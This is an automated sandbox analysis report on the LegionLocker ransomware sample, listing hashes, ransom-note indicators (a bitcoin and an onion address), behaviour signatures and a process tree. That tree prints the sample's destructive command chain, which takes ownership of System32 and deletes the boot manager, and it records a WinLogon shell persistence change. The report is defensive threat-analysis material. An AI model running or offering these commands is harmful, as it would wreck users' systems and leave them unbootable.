Analysis
-
max time kernel
150s -
max time network
58s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
26-07-2021 04:39
Static task
static1
Behavioral task
behavioral1
Sample
LegionLocker4.1.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
LegionLocker4.1.exe
Resource
win10v20210408
General
-
Target
LegionLocker4.1.exe
-
Size
6.1MB
-
MD5
04df8dd30da8b5853f48cc1ac9b695a8
-
SHA1
4c02262c2fea0e99277a99dcbe28a9c370b87c39
-
SHA256
78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
-
SHA512
3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
http://mail2tor2zyjdctd.onion/
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" LegionLocker4.1.exe -
Disables Task Manager via registry modification
-
Modifies extensions of user files 7 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\ConvertResolve.crw => C:\Users\Admin\Pictures\ConvertResolve.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\ExportUnpublish.raw => C:\Users\Admin\Pictures\ExportUnpublish.raw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\InstallComplete.png => C:\Users\Admin\Pictures\InstallComplete.png.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\SaveOptimize.crw => C:\Users\Admin\Pictures\SaveOptimize.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\WatchRename.raw => C:\Users\Admin\Pictures\WatchRename.raw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\WriteRename.png => C:\Users\Admin\Pictures\WriteRename.png.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe File renamed C:\Users\Admin\Pictures\CloseWatch.crw => C:\Users\Admin\Pictures\CloseWatch.crw.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 LegionLocker4.1.exe -
Possible privilege escalation attempt 7 IoCs
pid Process 1116 takeown.exe 1500 icacls.exe 616 takeown.exe 1868 icacls.exe 1668 takeown.exe 924 icacls.exe 1056 takeown.exe -
Modifies file permissions 1 TTPs 7 IoCs
pid Process 924 icacls.exe 1056 takeown.exe 1116 takeown.exe 1500 icacls.exe 616 takeown.exe 1868 icacls.exe 1668 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp" LegionLocker4.1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 464 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe 1728 LegionLocker4.1.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1728 LegionLocker4.1.exe Token: SeDebugPrivilege 1728 LegionLocker4.1.exe Token: SeTakeOwnershipPrivilege 1116 takeown.exe Token: SeTakeOwnershipPrivilege 616 takeown.exe Token: SeTakeOwnershipPrivilege 1668 takeown.exe Token: SeTakeOwnershipPrivilege 1056 takeown.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 1728 wrote to memory of 656 1728 LegionLocker4.1.exe 26 PID 1728 wrote to memory of 656 1728 LegionLocker4.1.exe 26 PID 1728 wrote to memory of 656 1728 LegionLocker4.1.exe 26 PID 656 wrote to memory of 1116 656 cmd.exe 28 PID 656 wrote to memory of 1116 656 cmd.exe 28 PID 656 wrote to memory of 1116 656 cmd.exe 28 PID 656 wrote to memory of 1500 656 cmd.exe 29 PID 656 wrote to memory of 1500 656 cmd.exe 29 PID 656 wrote to memory of 1500 656 cmd.exe 29 PID 656 wrote to memory of 616 656 cmd.exe 30 PID 656 wrote to memory of 616 656 cmd.exe 30 PID 656 wrote to memory of 616 656 cmd.exe 30 PID 656 wrote to memory of 1868 656 cmd.exe 31 PID 656 wrote to memory of 1868 656 cmd.exe 31 PID 656 wrote to memory of 1868 656 cmd.exe 31 PID 656 wrote to memory of 1668 656 cmd.exe 32 PID 656 wrote to memory of 1668 656 cmd.exe 32 PID 656 wrote to memory of 1668 656 cmd.exe 32 PID 656 wrote to memory of 924 656 cmd.exe 33 PID 656 wrote to memory of 924 656 cmd.exe 33 PID 656 wrote to memory of 924 656 cmd.exe 33 PID 656 wrote to memory of 1056 656 cmd.exe 34 PID 656 wrote to memory of 1056 656 cmd.exe 34 PID 656 wrote to memory of 1056 656 cmd.exe 34 PID 1728 wrote to memory of 324 1728 LegionLocker4.1.exe 39 PID 1728 wrote to memory of 324 1728 LegionLocker4.1.exe 39 PID 1728 wrote to memory of 324 1728 LegionLocker4.1.exe 39 PID 324 wrote to memory of 1456 324 cmd.exe 41 PID 324 wrote to memory of 1456 324 cmd.exe 41 PID 324 wrote to memory of 1456 324 cmd.exe 41 PID 1728 wrote to memory of 464 1728 LegionLocker4.1.exe 42 PID 1728 wrote to memory of 464 1728 LegionLocker4.1.exe 42 PID 1728 wrote to memory of 464 1728 LegionLocker4.1.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"C:\Users\Admin\AppData\Local\Temp\LegionLocker4.1.exe"1⤵
- Modifies WinLogon for persistence
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1500
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1868
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:924
-
-
C:\Windows\system32\takeown.exetakeown /f C:\bootmgr3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:324 -
C:\Windows\system32\rundll32.exerundll32 user32.dll,UpdatePerUserSystemParameters3⤵PID:1456
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt2⤵
- Opens file in notepad (likely ransom note)
PID:464
-